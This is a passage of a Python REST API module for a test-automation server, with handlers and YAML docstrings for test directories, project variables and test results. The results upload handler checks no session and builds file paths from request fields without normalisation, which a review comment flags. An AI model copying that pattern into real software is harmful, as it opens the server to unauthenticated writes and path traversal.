            project=projectId)
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to add directory")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")

        return {"cmd": self.request.path, "message": "directory successfully added",
                "project-id": projectId}
class TestsDirectoryRename(HandlerCORS):
    """
    /rest/tests/directory/rename
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Rename directory in the test storage
        description: ''
        operationId: testsDirectoryRename
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ project-id, directory-name, directory-path ]
                  properties:
                    project-id:
                      type: integer
                    directory-name:
                      type: string
                    directory-path:
                      type: string
                destination:
                  type: object
                  required: [ project-id, directory-name ]
                  properties:
                    project-id:
                      type: integer
                    directory-name:
                      type: string
        responses:
          '200':
            description: rename response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/directory/rename",
                  "message": "directory successfully renamed"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # write operations are forbidden for monitor-level users
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        try:
            # source block: project, current folder name and its parent path
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify source")
            projectId = self.request.data.get("source")["project-id"]
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            folderName = self.request.data.get("source")["directory-name"]
            if folderName is None:
                raise EmptyValue("Please specify a source folder name")
            folderPath = self.request.data.get("source")["directory-path"]
            if folderPath is None:
                raise EmptyValue("Please specify a source folder path")
            # destination block: only the new folder name is needed
            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify destination")
            newFolderName = self.request.data.get(
                "destination")["directory-name"]
            if newFolderName is None:
                raise EmptyValue("Please specify a destination folder name")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # avoid directory traversal
        folderPath = os.path.normpath("/" + folderPath)

        success = RepoTests.instance().renameDir(mainPath=folderPath, oldPath=folderName,
                                                 newPath=newFolderName, project=projectId)
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to rename directory")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500(
                "Unable to rename directory: source directory not found")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")

        return {"cmd": self.request.path, "message": "directory successfully renamed",
                "project-id": projectId, "directory-name": folderName,
                "directory-path": folderPath, "new-directory-name": newFolderName}
class TestsDirectoryDuplicate(HandlerCORS):
    """
    /rest/tests/directory/duplicate
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Duplicate directory in the test storage
        description: ''
        operationId: testsDirectoryDuplicate
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ project-id, directory-name, directory-path ]
                  properties:
                    project-id:
                      type: integer
                    directory-name:
                      type: string
                    directory-path:
                      type: string
                destination:
                  type: object
                  required: [ project-id, directory-name, directory-path ]
                  properties:
                    project-id:
                      type: integer
                    directory-name:
                      type: string
                    directory-path:
                      type: string
        responses:
          '200':
            description: duplicate response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/directory/duplicate",
                  "message": "directory successfully duplicated"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        # get the user profile; monitor accounts are read-only
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        # checking json request on post
        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify a source")
            projectId = self.request.data.get("source")["project-id"]
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            folderName = self.request.data.get("source")["directory-name"]
            if folderName is None:
                raise EmptyValue("Please specify a source folder name")
            folderPath = self.request.data.get("source")["directory-path"]
            if folderPath is None:
                raise EmptyValue("Please specify a source folder path")
            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify a destination")
            newProjectId = self.request.data.get("destination")["project-id"]
            if newProjectId is None:
                raise EmptyValue("Please specify a project id")
            newFolderName = self.request.data.get(
                "destination")["directory-name"]
            if newFolderName is None:
                raise EmptyValue("Please specify a destination folder name")
            newFolderPath = self.request.data.get(
                "destination")["directory-path"]
            if newFolderPath is None:
                raise EmptyValue("Please specify a destination folder path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # the user must be granted on both source and destination projects
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=newProjectId)

        # some security check to avoid directory traversal
        folderPath = os.path.normpath("/" + folderPath)
        newFolderPath = os.path.normpath("/" + newFolderPath)

        # all ok, do the duplication
        success = RepoTests.instance().duplicateDir(
            mainPath=folderPath, oldPath=folderName,
            newPath=newFolderName, project=projectId,
            newProject=newProjectId,
            newMainPath=newFolderPath
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to duplicate directory")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500(
                "Unable to duplicate directory: source directory not found")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")

        return {"cmd": self.request.path, "message": "directory successfully duplicated",
                "project-id": projectId}
class TestsDirectoryMove(HandlerCORS):
    """
    /rest/tests/directory/move
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Move directory in the test storage
        description: ''
        operationId: testsDirectoryMove
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ project-id, directory-name, directory-path ]
                  properties:
                    project-id:
                      type: integer
                    directory-name:
                      type: string
                    directory-path:
                      type: string
                destination:
                  type: object
                  required: [ project-id, directory-path ]
                  properties:
                    project-id:
                      type: integer
                    directory-path:
                      type: string
        responses:
          '200':
            description: move response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/directory/move",
                  "message": "directory successfully moved"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        # get the user profile; monitor accounts are read-only
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")
        # checking json request on post
        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify a source")
            projectId = self.request.data.get("source")["project-id"]
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            folderName = self.request.data.get("source")["directory-name"]
            if folderName is None:
                raise EmptyValue("Please specify a source folder name")
            folderPath = self.request.data.get("source")["directory-path"]
            if folderPath is None:
                raise EmptyValue("Please specify a source folder path")
            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify a destination")
            newProjectId = self.request.data.get("destination")["project-id"]
            if newProjectId is None:
                raise EmptyValue("Please specify a project id")
            newFolderPath = self.request.data.get(
                "destination")["directory-path"]
            if newFolderPath is None:
                raise EmptyValue("Please specify a destination folder path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # the user must be granted on both source and destination projects
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=newProjectId)
        # some security check to avoid directory traversal
        folderPath = os.path.normpath("/" + folderPath)
        newFolderPath = os.path.normpath("/" + newFolderPath)
        # NOTE(review): this guard compares paths only and ignores the project
        # ids, so moving to an identical path in a *different* project is also
        # rejected with 403 - confirm this is intended
        if "%s/%s" % (folderPath, folderName) == newFolderPath:
            raise HTTP_403("Destination same as origin")
        # all ok, do the move
        success = RepoTests.instance().moveDir(
            mainPath=folderPath,
            folderName=folderName,
            newPath=newFolderPath,
            project=projectId,
            newProject=newProjectId
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to move directory")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500(
                "Unable to move directory: source directory not found")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Directory already exists")
        return {"cmd": self.request.path, "message": "directory successfully moved",
                "project-id": projectId}
class TestsDirectoryRemove(HandlerCORS):
    """
    /rest/tests/directory/remove
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: remove directory in the test storage
        description: ''
        operationId: testsDirectoryRemove
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, directory-path ]
              properties:
                project-id:
                  type: integer
                directory-path:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/directory/remove",
                  "message": "directory successfully removed"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        # monitor accounts are read-only
        profile = _get_user(request=self.request)
        if profile['monitor']:
            raise HTTP_403("Access refused")

        # extract and validate the mandatory parameters
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
            folder_path = self.request.data.get("directory-path")
            if folder_path is None:
                raise EmptyValue("Please specify a source folder path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=profile['login'],
                                   project_id=project_id)

        # normalize the path to avoid directory traversal
        folder_path = os.path.normpath("/" + folder_path)

        rc = RepoTests.instance().delDir(folder_path, project_id)
        if rc == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to remove directory")
        if rc == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500("Unable to remove directory (missing)")
        if rc == Context.instance().CODE_FORBIDDEN:
            raise HTTP_403("Cannot remove directory")

        return {"cmd": self.request.path,
                "message": "directory successfully removed",
                "project-id": project_id}
"""
Variables handlers
"""
class VariablesAdd(HandlerCORS):
    """
    /rest/variables/add/
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - variables
        summary: Add test variable in project, variables can be accessible from test
        description: ''
        operationId: variablesAdd
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, variable-name,variable-value]
              properties:
                variable-name:
                  type: string
                variable-value:
                  type: string
                  description: in json format
                project-id:
                  type: integer
        responses:
          '200':
            description: variable successfully added
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
                variable-id:
                  type: string
            examples:
              application/json: |
                {
                  "message": "variable successfully added",
                  "cmd": "/variables/add",
                  "variable-id": "95"
                }
          '400':
            description: Bad request provided | Bad project id provided | Bad json provided in value
          '403':
            description: Access denied to this project | Variable already exists
          '500':
            description: Server error
        """
        # monitor accounts cannot create variables
        profile = _get_user(request=self.request)
        if profile['monitor']:
            raise HTTP_403("Access refused")

        # pull the mandatory fields out of the json body
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
            variable_name = self.request.data.get("variable-name")
            if variable_name is None:
                raise EmptyValue("Please specify the name of the variable")
            variable_json = self.request.data.get("variable-value")
            if variable_json is None:
                raise EmptyValue("Please specify the value of the variable")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=profile['login'],
                                   project_id=project_id)

        # the value is persisted serialized as json text
        try:
            variable_value = json.dumps(variable_json)
        except Exception:
            raise HTTP_400("Bad json provided in value")

        rc, details = VariablesManager.instance().addVariableInDB(projectId=project_id,
                                                                  variableName=variable_name,
                                                                  variableValue=variable_value)
        if rc == Context.instance().CODE_ERROR:
            raise HTTP_500(details)
        if rc == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403(details)

        return {"cmd": self.request.path,
                "message": "variable successfully added",
                "variable-id": details}
class VariablesDuplicate(HandlerCORS):
    """
    /rest/variables/duplicate
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - variables
        summary: Duplicate test variable in project
        description: ''
        operationId: variablesDuplicate
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [project-id, variable-id]
              properties:
                variable-id:
                  type: string
                project-id:
                  type: integer
        responses:
          '200':
            description: variable successfully duplicated
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
                variable-id:
                  type: string
            examples:
              application/json: |
                {
                  "message": "variable successfully duplicated",
                  "cmd": "/variables/duplicate",
                  "variable-id": "95"
                }
          '400':
            description: Bad request provided | Bad project id provided | Bad json provided in value
          '403':
            description: Access denied to this project
          '404':
            description: Variable not found
          '500':
            description: Server error
        """
        # duplication is not allowed for monitor accounts
        profile = _get_user(request=self.request)
        if profile['monitor']:
            raise HTTP_403("Access refused")

        # validate the json body
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
            variable_id = self.request.data.get("variable-id")
            if variable_id is None:
                raise EmptyValue("Please specify a variable id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=profile['login'],
                                   project_id=project_id)

        rc, details = VariablesManager.instance().duplicateVariableInDB(variableId=variable_id,
                                                                        projectId=project_id)
        if rc == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404(details)
        if rc == Context.instance().CODE_ERROR:
            raise HTTP_500(details)

        return {"cmd": self.request.path,
                "message": "variable successfully duplicated",
                "variable-id": details}
class VariablesUpdate(HandlerCORS):
    """
    /rest/variables/update
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - variables
        summary: Update test variable in project
        description: ''
        operationId: variablesUpdate
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [project-id, variable-id]
              properties:
                variable-id:
                  type: string
                variable-name:
                  type: string
                variable-value:
                  type: string
                  description: with json format
                project-id:
                  type: integer
        responses:
          '200':
            description: variable successfully updated
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "message": "variable successfully updated",
                  "cmd": "/variables/update"
                }
          '400':
            description: Bad request provided | Bad project id provided | Bad json provided in value
          '403':
            description: Access denied to this project
          '404':
            description: Variable not found
          '500':
            description: Server error
        """
        # monitor accounts are read-only
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        # checking json request on post
        try:
            variableId = self.request.data.get("variable-id")
            if variableId is None:
                # bugfix: raising HTTP_400 here was caught by the broad
                # "except Exception" below and re-wrapped as
                # "Bad request provided (... ?)", garbling the message;
                # EmptyValue keeps it intact like every sibling handler
                raise EmptyValue("Please specify a variable id")
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            # optional fields
            variableName = self.request.data.get("variable-name")
            variableJson = self.request.data.get("variable-value")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # dumps the json; the value is stored as json text
        # NOTE(review): when "variable-value" is absent this serializes None
        # to the string "null" - confirm updateVariableInDB treats that as
        # "no change"
        try:
            variableValue = json.dumps(variableJson)
        except Exception:
            raise HTTP_400("Bad json provided in value")

        success, details = VariablesManager.instance().updateVariableInDB(variableId=variableId,
                                                                          variableName=variableName,
                                                                          variableValue=variableValue,
                                                                          projectId=projectId)
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404(details)
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500(details)

        return {"cmd": self.request.path,
                "message": "variable successfully updated"}
class VariablesRemove(HandlerCORS):
    """
    /rest/variables/remove
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - variables
        summary: Remove test variable in project
        description: ''
        operationId: variablesRemove
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [project-id, variable-id]
              properties:
                variable-id:
                  type: string
                project-id:
                  type: integer
        responses:
          '200':
            description: variable successfully removed
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "message": "variable successfully removed",
                  "cmd": "/variables/remove"
                }
          '400':
            description: Bad request provided | Bad project id provided | Bad json provided in value
          '403':
            description: Access denied to this project
          '404':
            description: Variable not found
          '500':
            description: Server error
        """
        # monitor accounts are read-only
        user_profile = _get_user(request=self.request)
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        # checking json request on post
        try:
            variableId = self.request.data.get("variable-id")
            if variableId is None:
                # bugfix: raising HTTP_400 here was caught by the broad
                # "except Exception" below and re-wrapped as
                # "Bad request provided (... ?)", garbling the message;
                # EmptyValue keeps it intact like every sibling handler
                raise EmptyValue("Please specify a variable id")
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        success, details = VariablesManager.instance().delVariableInDB(
            variableId=variableId, projectId=projectId)
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404(details)
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500(details)

        return {"cmd": self.request.path,
                "message": "variable successfully removed"}
class VariablesListing(HandlerCORS):
    """
    /rest/variables/listing
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - variables
        summary: Get a listing of all test variables according to the project id or name
        description: ''
        operationId: variablesListing
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [project-id]
              properties:
                project-id:
                  type: integer
        responses:
          '200':
            description: variables listing
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
                variables:
                  type: array
                  description: variables list in json format
                  items:
                    type: object
                    required: [ project-id, id, name, value ]
                    properties:
                      project-id:
                        type: integer
                      id:
                        type: integer
                      name:
                        type: string
                      value:
                        type: string
            examples:
              application/json: |
                {
                  "variables": [
                    {
                      "project_id": 1,
                      "id": 1,
                      "value": false,
                      "name": "DEBUG"
                    }
                  ],
                  "cmd": "/variables/listing"
                }
          '400':
            description: Bad request provided | Bad project id provided | Bad json provided in value
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        # listing is allowed to any authenticated user of the project
        profile = _get_user(request=self.request)

        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=profile['login'],
                                   project_id=project_id)

        rc, details = VariablesManager.instance().getVariablesFromDB(projectId=project_id)
        if rc == Context.instance().CODE_ERROR:
            raise HTTP_500(details)

        return {"cmd": self.request.path,
                "message": "listing result",
                "variables": details}
class VariablesSearchByName(HandlerCORS):
    """
    /rest/variables/search/by/name
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - variables
        summary: Search a variable according to the name or id
        description: ''
        operationId: variablesSearchByName
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [project-id, variable-name]
              properties:
                project-id:
                  type: integer
                variable-name:
                  type: string
        responses:
          '200':
            description: search result
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
                variable:
                  description: variable in json format in only one match
                  type: object
                  required: [ project-id, id, name, value ]
                  properties:
                    project-id:
                      type: integer
                    id:
                      type: integer
                    name:
                      type: string
                    value:
                      type: string
                variables:
                  type: array
                  description: variables list in json format on several occurences
                  items:
                    type: object
                    required: [ project-id, id, name, value ]
                    properties:
                      project-id:
                        type: integer
                      id:
                        type: integer
                      name:
                        type: string
                      value:
                        type: string
            examples:
              application/json: |
                {
                  "variable": {
                    "project_id": 1,
                    "id": 95,
                    "value": "1.0",
                    "name": "VAR_AUTO"
                  },
                  "cmd": "/variables/search/by/name"
                }
          '400':
            description: Bad request provided | Bad project id provided | Bad json provided in value
          '403':
            description: Access denied to this project
          '404':
            description: Variable not found
          '500':
            description: Server error
        """
        profile = _get_user(request=self.request)

        # validate the json body
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
            variable_name = self.request.data.get("variable-name")
            if variable_name is None:
                raise EmptyValue("Please specify the name of the variable")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=profile['login'],
                                   project_id=project_id)

        rc, details = VariablesManager.instance().getVariableFromDB(projectId=project_id,
                                                                    variableName=variable_name)
        if rc == Context.instance().CODE_ERROR:
            raise HTTP_500(details)
        # NOTE(review): the yaml above documents a singular "variable" key for
        # a unique match, but the handler always answers with "variables"
        if len(details) == 0:
            raise HTTP_404("Variable not found")

        return {"cmd": self.request.path,
                "message": "search result",
                "variables": details}
class VariablesSearchById(HandlerCORS):
    """
    /rest/variables/search/by/id
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - variables
        summary: Search a variable according to the name or id
        description: ''
        operationId: variablesSearchById
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [project-id, variable-id]
              properties:
                project-id:
                  type: integer
                variable-id:
                  type: string
        responses:
          '200':
            description: search result
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
                variable:
                  description: variable in json format in only one match
                  type: object
                  required: [ project-id, id, name, value ]
                  properties:
                    project-id:
                      type: integer
                    id:
                      type: integer
                    name:
                      type: string
                    value:
                      type: string
                variables:
                  type: array
                  description: variables list in json format on several occurences
                  items:
                    type: object
                    required: [ project-id, id, name, value ]
                    properties:
                      project-id:
                        type: integer
                      id:
                        type: integer
                      name:
                        type: string
                      value:
                        type: string
            examples:
              application/json: |
                {
                  "variable": {
                    "project_id": 1,
                    "id": 95,
                    "value": "1.0",
                    "name": "VAR_AUTO"
                  },
                  "cmd": "/variables/search/by/id"
                }
          '400':
            description: Bad request provided | Bad project id provided | Bad json provided in value
          '403':
            description: Access denied to this project
          '404':
            description: Variable not found
          '500':
            description: Server error
        """
        profile = _get_user(request=self.request)

        # validate the json body
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
            variable_id = self.request.data.get("variable-id")
            if variable_id is None:
                raise EmptyValue("Please specify the id of the variable")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=profile['login'],
                                   project_id=project_id)

        rc, details = VariablesManager.instance().getVariableFromDB(projectId=project_id,
                                                                    variableId=variable_id)
        if rc == Context.instance().CODE_ERROR:
            raise HTTP_500(details)
        # NOTE(review): the yaml above documents a singular "variable" key for
        # a unique match, but the handler always answers with "variables"
        if len(details) == 0:
            raise HTTP_404("Variable not found")

        return {"cmd": self.request.path,
                "message": "search result",
                "variables": details}
"""
Tests Results handlers
"""
class ResultsUploadFile(HandlerCORS):
    """
    /rest/results/upload/file
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - results
        summary: Upload a file in the test result
        description: ''
        operationId: resultsUploadFile
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: body
            in: body
            required: true
            schema:
              required: [ result-path, file-name, file-content ]
              properties:
                result-path:
                  type: string
                file-name:
                  type: string
                file-content:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/results/upload/file",
                  "message": "success"
                }
          '400':
            description: Bad request provided
          '403':
            description: Extension file refused
          '404':
            description: Test result not found
          '500':
            description: Server error
        """
        # checking json request on post
        try:
            resultPath = self.request.data.get("result-path")
            if resultPath is None:
                raise EmptyValue("Please specify a result path")
            fileName = self.request.data.get("file-name")
            if fileName is None:
                raise EmptyValue("Please specify a file name")
            fileContent = self.request.data.get("file-content")
            if fileContent is None:
                raise EmptyValue("Please specify a file content")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # only a whitelist of extensions may be uploaded:
        # zip archives, screenshots (png/jpg) and video captures (mp4)
        if not fileName.endswith((".zip", ".png", ".jpg", ".mp4")):
            raise HTTP_403('Extension file not authorized')

        # NOTE(review): unlike the directory handlers above, resultPath and
        # fileName are used to build filesystem paths without an
        # os.path.normpath guard - confirm callers of this endpoint are trusted
        archiveRepo = '%s%s' % (Settings.getDirExec(),
                                Settings.get('Paths', 'testsresults'))
        if not os.path.exists("%s/%s" % (archiveRepo, resultPath)):
            raise HTTP_404('test result path not found')

        success = RepoArchives.instance().createResultLog(testsPath=archiveRepo,
                                                          logPath=resultPath,
                                                          logName=fileName,
                                                          logData=fileContent)
        if not success:
            raise HTTP_500("Unable to upload file in testresult")

        return {"cmd": self.request.path, 'message': 'success'}
class ResultsListingFiles(HandlerCORS):
    """
    /rest/results/listing/files
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - results
        summary: Get the listing of all tests results
        description: ''
        operationId: resultsListingFiles
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id ]
              properties:
                partial-list:
                  type: boolean
                project-id:
                  type: integer
        responses:
          '200':
            description: all test results with details
            schema :
              properties:
                cmd:
                  type: string
                listing:
                  type: list
                  description: listing all test results
                  items:
                    type: object
                project-id:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/results/listing/files",
                  "listing": [...],
                  "nb-folders": 2,
                  "nb-files": 2,
                  "statistics": {...}
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        profile = _get_user(request=self.request)

        # validate the json body; partial listing is the default
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
            partial = self.request.data.get("partial-list", True)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=profile['login'],
                                   project_id=project_id)

        nb_folders, nb_files, listing, stats = RepoArchives.instance().getTree(fullTree=not partial,
                                                                               project=project_id)
        return {"cmd": self.request.path,
                "listing": listing,
                "nb-folders": nb_folders,
                "nb-files": nb_files,
                "statistics": stats,
                'project-id': project_id}
class ResultsListingBasic(HandlerCORS):
    """
    /rest/results/listing/basic
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - results
        summary: Get the listing id of all tests results.
        description: ''
        operationId: resultsListingBasic
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id ]
              properties:
                project-id:
                  type: integer
        responses:
          '200':
            description: all tests results with id
            schema :
              properties:
                cmd:
                  type: string
                listing:
                  type: array
                  items:
                    type: object
                project-id:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/results/listing/basic",
                  "listing": [...]
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
